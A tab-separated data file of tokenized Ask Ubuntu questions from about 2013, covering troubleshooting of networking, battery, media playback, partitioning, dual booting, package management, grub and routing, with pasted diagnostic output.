320429	installed ubuntu 12.04 , wireless connected but no internet	eth0 link encap : ethernet hwaddr 00:23:54 : bd:2a : dd up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:462 errors:0 dropped:0 overruns:0 frame:0 tx packets:462 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:32651 ( 32.6 kb ) tx bytes:32651 ( 32.6 kb ) wlan0 link encap : ethernet hwaddr 00:14 : d1:63 : a6:40 inet addr:192.168.0.103 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :214 : d1ff : fe63 : a640/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:129 errors:0 dropped:0 overruns:0 frame:0 tx packets:563 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:30352 ( 30.3 kb ) tx bytes:62116 ( 62.1 kb ) dad @ dad : ~ $ iwconfig wlan0 ieee 802.11bgn essid : '' carz2 '' mode : managed frequency:2.462 ghz access point : 28:10:7b : f2 : d6:7a bit rate=39 mb/s tx-power=27 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=46/70 signal level=-64 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:21 invalid misc:69 missed beacon:0 lo no wireless extensions . eth0 no wireless extensions . dad @ dad : ~ $ nm-tool networkmanager tool state : connected ( global ) device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : forcedeth state : unavailable default : no hw address : 00:23:54 : bd:2a : dd capabilities : carrier detect : yes wired properties carrier : off device : wlan0 [ carz2 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : 802.11 wifi driver : rt2800pci state : connected default : yes hw address : 00:14 : d1:63 : a6:40 capabilities : speed : 86 mb/s wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points ( * = current ap ) att952 : infra , 1c:14:48:56 : fc:90 , freq 2412 mhz , rate 54 mb/s , strength 47 wpa wpa2 betsy : infra , 5c : d9:98:6d : c8:26 , freq 2412 mhz , rate 54 mb/s , strength 40 wpa vivien : infra , c0 : c1 : c0:8a : a3:8b , freq 2462 mhz , rate 54 mb/s , strength 37 wpa2 att472 : infra , 20 : e5:64 : b2 : c6 : a0 , freq 2412 mhz , rate 54 mb/s , strength 30 wpa wpa2 att048 : infra , 40 : b7 : f3:23:1f:20 , freq 2437 mhz , rate 54 mb/s , strength 30 wpa wpa2 dh : infra , 30:46:9a:9b : d9 : ae , freq 2462 mhz , rate 54 mb/s , strength 30 wpa wpa2 netgear08 : infra , 74:44:01:70 : fe:66 , freq 2437 mhz , rate 54 mb/s , strength 27 wpa2 att400 : infra , 20 : e5:64 : ac:2a : f0 , freq 2462 mhz , rate 54 mb/s , strength 24 wpa wpa2 b2b : infra , 74:31:70:0b:32:08 , freq 2412 mhz , rate 54 mb/s , strength 20 wpa2 chowfunpoint : infra , ac:5d:10:19:02 : a9 , freq 2427 mhz , rate 54 mb/s , strength 20 wpa wpa2 jin-pc_network : infra , 58:6d:8f:32:51 : bc , freq 2437 mhz , rate 54 mb/s , strength 20 wpa2 tonydang : infra , 00:26:82 : f3:15:12 , freq 2452 mhz , rate 54 mb/s , strength 20 wpa2 nhaai : infra , 94:0c:6d : ee : f7 : ea , freq 2462 mhz , rate 54 mb/s , strength 20 wpa 2wire218 : infra , ac:5d:10:1c:9f:89 , freq 2422 mhz , rate 54 mb/s , strength 17 wpa wpa2 mckhome : infra , 74:9d : dc : e9:6d : b1 , freq 2457 mhz , rate 54 mb/s , strength 17 wpa wpa2 2wire894 : infra , 28:16:2e:14:86:11 , freq 2432 mhz , rate 54 mb/s , strength 14 wpa wpa2 att536 : infra , 94 : cc : b9 : b9:3b:50 , freq 2452 mhz , rate 54 mb/s , strength 14 wpa wpa2 yilincao : infra , 00:24 : c9:79:13:20 , freq 2437 mhz , rate 54 mb/s , strength 37 wep 2wire862 : infra , 00:1a : c4:9e:30 : c9 , freq 2417 mhz , rate 54 mb/s , strength 34 wep 2wire322 : infra , 00:1e : c7:19:11 : c1 , freq 2412 mhz , rate 54 mb/s , strength 30 wep 2wire778 : infra , 3c : ea:4f:83:69 : c9 , freq 2417 mhz , rate 54 mb/s , strength 30 wep 2wire764 : infra , c0:83:0a:69 : d7 : c9 , freq 2427 mhz , rate 54 mb/s , strength 27 wep cp30 : infra , f0:25:72:70:30:40 , freq 2442 mhz , rate 54 mb/s , strength 20 wep pokemon : infra , 00:1c : f0:61 : c1:43 , freq 2412 mhz , rate 54 mb/s , strength 27 chinatownwifi : infra , 00:0d:97:02:20:91 , freq 2457 mhz , rate 11 mb/s , strength 17 *carz2 : infra , 28:10:7b : f2 : d6:7a , freq 2462 mhz , rate 54 mb/s , strength 52 wpa wpa2 belkin_g_wireless_cba20b : infra , 00:22:75 : cb : a2:0b , freq 2437 mhz , rate 54 mb/s , strength 27 wpa wpa2 clearspot_667b3 : infra , 00:1e:31 : c6:67 : b3 , freq 2442 mhz , rate 54 mb/s , strength 14 wpa wpa2 att184 : infra , b0:77 : ac : d9:55 : a0 , freq 2412 mhz , rate 54 mb/s , strength 30 wpa wpa2 att936 : infra , 94 : cc : b9 : b7 : dd:50 , freq 2462 mhz , rate 54 mb/s , strength 10 wpa wpa2 2wire357 : infra , b0 : e7:54 : df : b8:41 , freq 2412 mhz , rate 54 mb/s , strength 34 wep agcaoili : infra , 98:2c : be:5c : b2:89 , freq 2452 mhz , rate 54 mb/s , strength 17 wep ipv4 settings : address : 192.168.0.103 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.0.1 dns : 192.168.0.1 dad @ dad : ~ $ ping -c3 192.168.0.1 ping 192.168.0.1 ( 192.168.0.1 ) 56 ( 84 ) bytes of data . -- - 192.168.0.1 ping statistics -- - 3 packets transmitted , 0 received , 100 % packet loss , time 2016ms
320434	how do i extend battery from lacking ?	i wan na ask you guys about extending battery . i run precise , my laptop ca n't work more than 1 hour , after it 's fully charged . the notification after i unplug the charger only shows 0:45 . how can i work with that condition ?
320437	banshee crashing , unable to list a dvd in its browser panel on xubuntu	i just upgraded to raring ringtail and i decided to start using banshee , it looks great and integrated dvds and videos is a major plus point . i ca n't get banshee to list the dvd in its browser unless it 's mounted , and when i click the entry to play the mounted dvd it just crashes . i put a bounty on the question now because i came to banshee from clementine because that had different problems . i 'm not getting this sorted out on my own too quick and people are demanding to play their dvds . i figured it should be like a music cd and just be playable without being mounted . it looks like i need to mount the dvd to see it in the browser panel , but that requires extra interaction with xubuntu outside banshee . if anyone can answer that i 'd be grateful , but the bounty is for a solution to the crashing . i 've got libdvdcss2 installed and gstreamer-ugly . i have the option in the extensions preferences checked to play dvds and cds . this is the error i get when running it from the cli and trying to play a dvd : libdvdread : using libdvdcss version 1.2.12 for dvd access *** zero check failed in ifo_read.c:570 for vmgi_mat- > zero_3 = 0x00000000010000000000000000000000000000 libdvdnav : using dvdnav version 4.2.0 libdvdread : using libdvdcss version 1.2.12 for dvd access *** zero check failed in ifo_read.c:570 for vmgi_mat- > zero_3 = 0x00000000010000000000000000000000000000 libdvdnav : dvd title : sandmann libdvdnav : dvd serial number : 3b1f5a2b libdvdnav : dvd title ( alternative ) : libdvdnav : unable to find map file '/home/adam/.dvdnav/sandmann.map' libdvdnav : dvd disk reports itself with region mask 0x00000000 . regions : 1 2 3 4 5 6 7 8 libdvdread : attempting to retrieve all css keys libdvdread : this can take a _long_ time , please be patient libdvdread : get key for /video_ts/video_ts.vob at 0x0000011d libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_01_0.vob at 0x00005d30 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_01_1.vob at 0x00005f9a libdvdread : elapsed time 0 libdvdread : found 1 vts's libdvdread : elapsed time 0 libdvdnav : language 'en ' not found , using 'de ' instead libdvdnav : menu languages available : de libdvdnav : language 'en ' not found , using 'de ' instead libdvdnav : menu languages available : de libdvdnav : language 'en ' not found , using 'de ' instead libdvdnav : menu languages available : de libdvdnav : language 'en ' not found , using 'de ' instead libdvdnav : menu languages available : de *** libdvdread : check_value failed in nav_read.c:264 *** *** for dsi- > dsi_gi.zero1 == 0 *** libdvdnav : language 'en ' not found , using 'de ' instead libdvdnav : menu languages available : de ( banshee:988 ) : gstreamer-critical ** : gst_element_query : assertion `gst_is_element ( element ) ' failed ( banshee:988 ) : gstreamer-critical ** : gst_element_query : assertion `gst_is_element ( element ) ' failed ( banshee:988 ) : gstreamer-critical ** : gst_element_query : assertion `gst_is_element ( element ) ' failed *** libdvdread : check_value failed in nav_read.c:264 *** *** for dsi- > dsi_gi.zero1 == 0 *** *** libdvdread : check_value failed in nav_read.c:264 *** *** for dsi- > dsi_gi.zero1 == 0 *** *** libdvdread : check_value failed in nav_read.c:264 *** *** for dsi- > dsi_gi.zero1 == 0 *** *** libdvdread : check_value failed in nav_read.c:264 *** *** for dsi- > dsi_gi.zero1 == 0 *** *** libdvdread : check_value failed in nav_read.c:264 *** *** for dsi- > dsi_gi.zero1 == 0 *** *** libdvdread : check_value failed in nav_read.c:264 *** *** for dsi- > dsi_gi.zero1 == 0 *** ** ( banshee:988 ) : critical ** : bp_get_subtitle_description : assertion `code ! = null ' failed *** libdvdread : check_value failed in nav_read.c:264 *** *** for dsi- > dsi_gi.zero1 == 0 *** the program 'banshee ' received an x window system error . this probably reflects a bug in the program . the error was 'badalloc ( insufficient resources for operation ) ' . ( details : serial 44 error_code 11 request_code 149 minor_code 19 ) ( note to programmers : normally , x errors are reported asynchronously ; that is , you will receive the error a while after causing it . to debug your program , run it with the -- sync command line option to change this behavior . you can then get a meaningful backtrace from your debugger if you break on the gdk_x_error ( ) function . ) adam @ gondor : ~ $
320442	tlp vs laptop-mod-tools	my laptop battery got empty soon and i installed bumblebee and tlp , now i have about 3hour battery energy more than before on my laptop . and now i found there is an other powermanagement for ubuntu laptop-mod-tools . which one is the best for powermanagement on ubuntu 13.04 ? tlp or laptop-mod-tools ?
320444	setting up rbenv properly	i have rvemv installed but every time i close terminal i 'm required to execute exec $ shell for it to reload rvemv otherwise i get an error that rbemv is not installed . how can i fix this so i do n't need to execute exec $ shell ? this is also included in my .bashrc : export path= '' $ home/.rbenv/bin : $ path '' eval `` $ ( rbenv init - ) ''
320452	stuck in partitioning loop installing 12.04 server	i burned a cd from the iso for ubuntu 12.04.2 server 64-bit and am working from it . i have already partitioned my disk . i selected partition 1 ( 1gib ) as /boot , ext2 , bootable and partition 11 ( 32gib ) as / , ext4 . when i request the next step , `` install base system '' , it just takes me back to the partition-selection screen . what does it want ? thanks in advance for any help .
320455	installing ubuntu on acer iconia w510	i want to buy the most modern touch screen laptop , acer iconia w510 . i like it so much . but i will buy only if i can install ubuntu on it . i was not able to find the answer when i searched in google . anyone who knows whether i can install a latest version of ubuntu on it or the stable version ubuntu 12.04 is appreciated .
320458	how to exclude multiple directories with rsync ?	i am trying to backup my home directory using rsync , and i want to exclude some of the directories that contain junk . i want to specifically exclude /home/ben/.ccache and /home/ben/build . unfortunately the documentation for rsync was information overload and did n't answer my question . this is what i tried : rsync -arv -- exclude `` /home/ben/.ccache : /home/ben/build '' /home/ben /media/ben/thumbdrive/ what is the right way to do this ?
320460	lubuntu 13.04 how to install entire repo ?	i would like to install an entire repo , instead of going through and installing each package , is that possible ? ? id think it be something like apt-get install repo-blahblahblah or something like that .
320466	will i be able to install ubuntu tablet on my hipstreet titan tablet ?	i have a hipstreet titan tablet ( hs-7dtb4-16g ) , will i be able to install ubuntu tablet on my hipstreet titan tablet ?
320469	ubuntu 13 and windows 7 are not friends	i downloaded ubuntu 13.04 64 . i wanted to install it to dual boot with windows 7 64 bit . the computer is a hp dv6 with intel i7 ; 8 gb of ram , and a 1 tb hdd . i tried for days to install ubuntu but after reading a great deal on this site , i found out hp tools and windows took up all 4 portions on the hdd . so i wiped out all the hp tools and restore stuff . i then installed ubuntu . it wiped out windows and my computer could n't even see the hard drive . so i put the hdd in my other computer and was able to save all my data . i did a low level format and then reinstalled windows , making sure not to let the hp tools back on the drive . this left me with windows 7 only in my hdd . then i tried to install ubuntu a second time . i followed this tutorial to the nail . it all seemed to go well : i created /boot , / and /home partitions ; i did n't create a swap since i have 8 gb of ram . it finished installing and said i needed to reboot . after i reboot , windows loads up but no way to access ubuntu . i 've never used it and i am at a lost , it 's so different from windows . : ( fixing windows based systems is what i do , so i 'm always the one giving help . i would be so very grateful for any help .
320470	what is the authentication password ?	i 'm very new to ubuntu , and i just installed it on my new chromebook acer c7 . i never made an authentication password , and when i try to download something , it asks me for it . please help !
320471	some index files failed to download	when i ran sudo apt-get update then i found some error . the error is like below : w : failed to fetch cdrom : //ubuntu 13.04 _raring ringtail_ - release amd64 ( 20130424 ) /dists/raring/main/binary-amd64/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu 13.04 _raring ringtail_ - release amd64 ( 20130424 ) /dists/raring/restricted/binary-amd64/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu 13.04 _raring ringtail_ - release amd64 ( 20130424 ) /dists/raring/main/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu 13.04 _raring ringtail_ - release amd64 ( 20130424 ) /dists/raring/restricted/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms e : some index files failed to download . they have been ignored , or old ones used instead . could anyone please help me why i am getting this kind error message ? i 've just found the error message today on my machine
320486	does n't work wired / wireless networks	i installed ubuntu by wubi along side windows 8 , with no problems . but i can not connect to the internet , wireless or wired . it 's my first time using ubuntu , so i do n't know how to do a lot of things . could anyone help me ?
320488	question about drives ( partition does not start on physical sector boundary )	i have been reading this site quite a bit getting my first ever ubuntu box running and had a question , currently my drive has partitions showing like this /dev/sda1 * 2048 31459327 15728640 27 hidden ntfs winre /dev/sda2 31459328 31664127 102400 7 hpfs/ntfs/exfat /dev/sda3 31664128 656826936 312581404+ 7 hpfs/ntfs/exfat /dev/sda4 656828414 976771071 159971329 5 extended partition 4 does not start on physical sector boundary . /dev/sda5 656828416 971048959 157110272 83 linux /dev/sda6 971051008 976771071 2860032 82 linux swap / solaris i believe sda1 is acer recovery disk or something , sda2 is the one i have been using to boot windows and sda3 seems to be my main windows storage drive . i am wondering what is going on with sda4 . it appeared like that after i had to re-install ubuntu ( i messed my first install up trying to get acer wireless to work ) . should i worry about this ? everything runs fine so far in both ubuntu and windows . if i just ignore it , could anything happen ? i am dual booting windows 7 and ubuntu 12.04 . i should also note , just before i installed ubuntu i had to do a recovery/repair of windows 7 . it would n't even load past the boot screen so i did a repair from the windows cd . not sure that affects anything . thanks
320490	ca n't login to gnome 3 ( no login screen ) 13.04	i installed ubuntu 13.04 the one from their website , then i installed gnome 3 to try it but i do n't have a login screen it just goes to unity . i did this before and i had the option on the login screen to choose unity or gnome or gnome classic but i do n't anymore . if anyone could help that would be awesome !
320492	switching from side by side ubuntu to main os on lenovo laptop	i am loving ubuntu and i would like to switch from ubuntu 12.10 side by side with win7 to ubuntu as the sole os ( and eventually run win7 via virtualbox ) . after i backup everything , wipe the entire ssd and re-install ubuntu as the sole os , how do i keep my previous linux identity ? examples : username computer name root password thanks ... p.s . if you have seen this question before , could you point me in the right direction ?
320493	list all packages at a deb-src using apt-get ?	is there a way to get a listing of packages at a deb-src `` resource '' using apt-get ? like apt-get < deb-src > *python* to `` see '' whats available ? i installed a `` base '' lubuntu install and am looking to see what packages are available to build it up with ( its an old school toshiba nb305 netbook , rocking the 2gb dimm , lookout ) . thanks .
320496	apt-get returns err http : //archive.ubuntu.com/ubuntu/ maverick/main b43-fwcutter i386 1:013-2 404 not found [ ip : 91.189.92.201 80 ]	i 'm new to the forum and i 'm running a new install of ubuntu 10.10 on my old dell d610 . synaptic manager will only download 117 of 142 packages , and when i try to download/install from there or a command line i get the same error below . i need to get my wireless working , and the drivers that came with the iso do not include the bcm4318 i need . thanks for any help ! ! ! dan @ dan-latitude-d610 : ~ $ sudo apt-get install b43-fwcutter [ sudo ] password for dan : reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : fakeroot libgif4 patch use 'apt-get autoremove ' to remove them . the following new packages will be installed : b43-fwcutter 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . need to get 16.3kb of archives . after this operation , 81.9kb of additional disk space will be used . warning : the following packages can not be authenticated ! b43-fwcutter install these packages without verification [ y/n ] ? y err http : //archive.ubuntu.com/ubuntu/ maverick/main b43-fwcutter i386 1:013-2 404 not found [ ip : 91.189.92.201 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/b/b43-fwcutter/b43-fwcutter_013-2_i386.deb 404 not found [ ip : 91.189.92.201 80 ] e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? dan @ dan-latitude-d610 : ~ $
320497	how do you use wine ?	i recently bought a canon pixma ip2700 printer . i tried to install it , and the computer would n't let me , saying it was not compatible with the current operating system . i think i do n't know enough about wine and would like to learn more . i was able to successfully install midisport , but that 's it . what am i doing wrong ?
320498	why wo n't ubuntu 12.04 lts boot ? ( dual install win8/ubunut 12.04lts grub is appearing )	i have a laptop that i have been dual booting windows 8 and ubuntu on for over a month now , but for some reason ubuntu has stopped booting . upon powering up the computer grub shows up and displays the operating systems as it always has , but when i select ubuntu i get a black screen with a flashing underscore cursor . i have been racking my brain for causes , but i can not figure it out . it was working , then it was n't . first i tried using the `` recovery mode '' to fix any issues , but i could n't even get it to boot into recovery mode . although i admittedly do not know what was being output to the screen , it kept hanging up on at different points ( the numbers ranged from 18 to 100 ) and the errors read something like `` unfriendly input/output error '' . i tried using the `` boot-repair '' live cd with no avail . i think one of the primary issues was simply that i could n't get my computer to connect through the internet even while using an ethernet cable . i am re-downloading the ubuntu cd now with the intent of trying to download and install boot-repair as instructed here : https : //help.ubuntu.com/community/recoveringubuntuafterinstallingwindows # using_the_ubuntu_alternate_cd any insights as to what caused this or what is wrong ? also , will the boot-repair utility actually repair the damage that has been incurred ?
320501	how to make ubuntu 13.04 open .py with idle for python 2.7 automatically ?	i 'm using ubuntu 13.04 and python 2.7 . when i click a .py file , it opens it in gedit . i want it to open in idle . when i right-click and choose `` open with '' , idle is not in the list . i have tried several things i 've read online but none have worked . edit : i 've fixed it . i needed to add a -python2.7 when opening idle.desktop , which allowed me to open the proper file and edit the proper line .
320503	how to enable hardware acceleration with the radeon hd 7870 ?	any idea on how to do this ? the open source driver does not do this , and the 2 propriety drivers ( fglrx and fglrx-updates ) both cause my computer to refuse to boot up . the output of /usr/lib/nux/unity_support_test -p is : not software rendered : no not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : no the lack of hardware acceleration has made my computer pretty much unusable , it runs minecraft a 6 fps ... thanks in advance for the help !
320504	is the ubuntu 12.04 server support linux kernel version 2.4.20 ?	because i will use htb for ubuntu server 12.04 .
320505	can not find orca gui based settings manager on ubuntu 13.04	i use ubuntu 13.04 . i found orca could initialized in universal access , but i can not find its gui based settings manager . i ca n't even start its settings manager via the command orca -- setup or with the key combination insert+space . it 's very convenient/needed for a blind user to change the general settings like speaking rate , pitch and many other things . it 's a lot less accessible if one has to run orca -- text-setup every time or edit a configuration file . how can i get the orca settings manager ?
320506	upgrading from 12.04 lts to 13.04	i am thinking of installing 12.04 lts on a partition on my hard drive . when 13.04 matures will it be possible to upgrade to 13.04 from within 12.04 without dragging out the dvd , wiping 12.04 and doing a fresh install ?
320508	device links in nautilus ( files ) sidebar wo n't mount/unmount	i have set up my macbook pro 8,1 to dual-boot ubuntu 13.04 + osx mountain lion . after the installation was finished i changed my linux uid to 501 so that it matches the uid on the osx install . i updated all file permissions , ubuntu seemed to have no problems . i can mount the osx partitions in terminal ( and i do n't need sudo to do it ) : /usr/bin/udisks -- mount /dev/sda3 and they mount to /media/ < device name > i can also read the osx partitions and write to the unjournaled osx partition . in nautilus there are links to the partitions under devices in the sidebar , but these links wo n't mount the partitions they link to . i get a message that the location can not be displayed and i do n't have the necessary permissions . if i mount the partitions via the terminal first , then the sidebar links do work , but the links wo n't work to unmount without authenticating , a message pops up saying they were mounted by another user . according to /var/log/syslog , clicking the link uses the correct uid jul 15 17:42:34 silverfox dbus [ 930 ] : [ system ] activating service name='org.freedesktop.hostname1 ' ( using servicehelper ) jul 15 17:42:34 silverfox dbus [ 930 ] : [ system ] successfully activated service 'org.freedesktop.hostname1' jul 15 17:42:41 silverfox udisksd [ 1920 ] : mounted /dev/sda3 at /media/mathew/book on behalf of uid 501 jul 15 17:50:24 silverfox dbus [ 930 ] : [ system ] activating service name='org.freedesktop.hostname1 ' ( using servicehelper ) jul 15 17:50:24 silverfox dbus [ 930 ] : [ system ] successfully activated service 'org.freedesktop.hostname1' jul 15 17:50:26 silverfox udisksd [ 1920 ] : cleaning up mount point /media/mathew/book ( device 8:3 is not mounted ) jul 15 17:50:26 silverfox udisksd [ 1920 ] : unmounted /dev/sda3 on behalf of uid 501 what 's the difference between what i do via the terminal and what nautilus is doing ? any advice on how can i dig a bit further into understanding and fixing this ?
320510	accidentally chose wrong login manger during upgrade	i ended up choosing gdm as my login manager during my upgrade from 12.04 to 12.10 . now all i have is the boring default gray gdm login . how can i change it back ?
320518	change login resolution in xubuntu 13.04 ?	i just installed xubuntu 13.04 and enabled the drivers from fglrx-update for my radeon hd 5400 series video card . however , once the login screen comes up , i get a warning from my monitor about the resolution not being supported . i can change the resolution once i 'm logged in , but i keep getting the same warning when i boot up the computer and try to log in . most guides/sites i could find about this problem suggest editing xorg.conf , but that file is not present on my system . i tried the solution in http : //www.bingshui.org/tech/defining-display-resolutions-in-xubuntu-12-04/ but this caused the system to freeze right before the login screen comes up , and i had to delete the file created when trying that solution . how to change the screen resolution for the gdm login screen ? suggests editing /etc/gdm/init/default , but again , there is no gdm directory in /etc . is there a way to fix this ?
320522	how to install steam through ubuntu software center without logging into ubuntu one	i 'm on 13.04 and i ca n't see any option to install steam directly through ubuntu software center without logging in with ubuntu one account . how can i access ubuntu software center and install steam without logging in to ubuntu one ?
320526	how to fix `` e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) ''	i am trying to install unetbootin on ubuntu but get the above error and this one : e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? can anybody tell me how to fix this so i can install unetbootin successfully ?
320527	defunct processes and their parent processes	i came across this so post : http : //stackoverflow.com/questions/356722/killing-a-defunct-process-on-unix-system '' you have killed the process , but a dead process does n't disappear from the process table until its parent process performs a task called `` reaping '' ( essentially calling wait ( 3 ) for that process to read its exit status ) . dead processes that have n't been reaped are called `` zombie processes . '' here is my defunct process : ps aux | grep ruby 1000 11958 16.3 0.0 0 0 pts/3 z jul11 1065:28 [ ruby ] < defunct > this is what it was supposed to do : rails_env=production bundle exec ruby lib/daemons/db_service_ctl start % basically it runs the rails daemons process . i wanted to restart it so i tried to kill it but it refused to die , and now i have a defunct process . here is its parent process : ps -f 11958 uid pid ppid c stime tty stat time cmd 1000 11958 11957 16 jul11 pts/3 z 1065:28 [ ruby ] < defunct > the parent process is 11957 . the proc cmdline looks like this : /proc/11957 $ cat cmdline /bin/sh./script/db_service.sh % that looks like the same shell script that i executed as the daemons process ! so how can this be the parent process too ?
320535	deleted ubuntu partition , forgot to restore mbr , bios supervisor password	so , i have gotten into this madness . i deleted my notebook ubuntu partition , wanted to delete the ubuntu . but alas , i forgot to restore the mbr . well , no biggie if i can access live usb ubuntu installation ( i install trough wubi before ) , but i just realized my bios is locked with supervisor password which i never set before . to sumarize it , this is my condition : boot get into grub-rescue trying to access live usb supervisor password lock madness and then i try to use boot rescue ... the partition was deleted , remember ? so i use my hard disk and copy /boot/ folder from my other notebook . i try this command : set prefix= ( hd1 , msdos3 ) /boot/grub **to go to /boot folder in hard disk insmod ntfs **i read that i need to load it to open ntfs disk insmod chain **chainloader function set root= ( hd0 , msdos2 ) chainloader ( hd0 , msdos2 ) +1 **i get an `` no such partition '' and i 'm pretty sure the partition exist . so , if anyone could help me i would be very grateful .
320536	the xscreensaver daemon does n't seem to be running on `` :0 ''	since in ubuntu 12.04 there were n't integrated screen savers ( btw , why ? ) , i looked for a tutorial online and installed xscreensaver 5.15 . the problem is that it wo n't start the sccreen savers until i 've actually opened the preferences window - then it says the xscreensaver daemon does n't seem to be running on `` :0 '' . launch it now ? if i click ok , it then works . is there a way to get it to run when the computer starts up ? a screen saver is kindah useless if you have to tell it to start every time you turn your computer on ... here 's my xscreensaver entry in startup apps :
320537	where is /etc/sysconfig/networking/devices/ directory in ubuntu	i am trying to setup usb gsm modem . i ca n't find /etc/sysconfig/networking/devices/ directory to put driver configuration file . in ubuntu where can i find this directory ? i want to put /etc/sysconfig/networking/devices/ifcfg-verizon_usb file onboot=no userctl=yes peerdns=yes type=modem device=ppp0 bootproto=dialup ccp=on pc=on ac=on bsdcomp=on vj=on vjccomp=on linespeed=115200 modemport=/dev/cellphone provider=verizonqnc defroute=yes persist=no papname=qnc wvdialsect=verizon_usb modemname=modem_usb demand=no
320541	what does `` partial upgrade '' when installing owncloud client from third party repository ?	i have installed owncloud-client from ubuntu repositories . but it opens a popup on every startup , which informs about a new version . therefor i decided to get the update from a 3rd party repository and i have added deb http : //download.opensuse.org/repositories/isv : owncloud : devel/xubuntu_12.04/ / so my sources . but now my software updater opens a dialog titled not all updates can be installed and suggests to make an partial upgrade . what does that mean , what will the partial upgrade do with my ubuntu and what consequences do i have to expect ?
320543	how can i execute default route commands at startup ( two nics ) ?	so i 've got one server box that has two network cards . one connects to the internet via isp router ( and serves a website ) and one connects to a lan . the thing is that in order for everything to work right , i need after each reboot to run these commands : sudo route del default gw 192.168.10.1 # the gateway of the lan card sudo route add default gw 10.10.10.1 # the gateway of the isp router card my question is , how can i make these commands run automatically at system reboot ( and not at any user logon , as nobody logs into the box ) ?
320544	gnome-screenshot returns gray image	i 'm having this problem since i got ubuntu 13.04 ( few weeks ago ) . at random times , when using gnome-screenshot , i get a gray image . it does n't work until i restart my computer . i 've tried getting gnome 3.8 ( it was a very bad idea ) , but it did n't solve the issue . some other applications that capture screenshots ( screencloud ) have the same issue . here 's the gray image i 'm getting . i 've searched everywhere , but i could n't find an answer . my specs : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) ram:2gb type of computer : laptop .
320545	how to launch tor ?	i 'm trying to use tor but the problem is when i click on the tor browser it says it needs an update . i grant permission ( allow executing file as program ) to start-tor-browser and i downloaded the recent update bundle of tor but when i double click on start-tor-browser the text file pops up and when i click on the tor browser it says it needs an update when i use terminal sudo start-tor-browser or sudo /start-tor-browser it says command not found . i 'm new to linux and i have very little knowledge of the os . if needed i can post screen shots .
320548	causes of and how to minimize damage from forced shut downs ?	backstory : since running 12.04 lts , my computer has experienced two sudden losses of power ; one due to my ham-fisted attempt to reboot and one due to a battery-less power cable disconnection . both times there were booting problems directly after that the automatic fsck could not fix . i reinstalled after the first boot error and that fixed the problem but the second time i decided to try to figure out what the actual problem was . i learned a lot by messing around with the hard drive and os trying to figure out what the heck was wrong but the two year old hard drive was unable to survive any more abuse and kicked the bucket before i found an answer . i have purchased a replacement but i am still looking for an autopsy and a way to prevent this from happening in the future . questions : what are some causes of boot problems after a sudden power off ? the hard drive containing the os not being properly unmounted ? could a forced shut down actually cause the hard drive itself to become confused ? how does a forced shut down affect the journaling of an ext4 file system ? how can ubuntu be configured to minimize damage from a sudden shut down ? the obvious answer being `` do n't shut down by holding the power button , stupid '' and though i have found some alternate ways to force a misbehaving session to terminate , sudden shut downs are not always caused intentionally by the user . running ubuntu on a laptop also increases the chances of a less-than-graceful power off . if there are things within 12.04 ( either os settings or settings of the hard drive itself ) that could be configured to minimize the damage , i would be grateful to be made aware of them .
320551	windows 7 & ubuntu	i want to download ubuntu on windows 7 and dual boot the two but before i do there is the question , can i dual boot windows 7 and ubuntu ? and if i do , does it work and is it safe for the os ? what is the procedure to follow after downloading ubuntu to dual boot with windows 7 ?
320554	ubuntu 13.04 desktop is not showing	whenever i m trying to start my pc .its not possible to go to.the desktop ... it takes some time and shows initramfs . can anyone help me .
320558	ca n't find a program in either software centre or console , want to uninstall it ( 13.04 )	( 13.04 ) i downloaded and installed a program from the internet ( .bundle ) , but it crashes every time i try to run it . i ca n't find it in the software centre it does n't have an `` uninstall '' option in the dash sudo apt-get remove v + tab does n't list it dpkg -- list does n't show it either i need to uninstall it and try installing a different version , but how do i find it ?
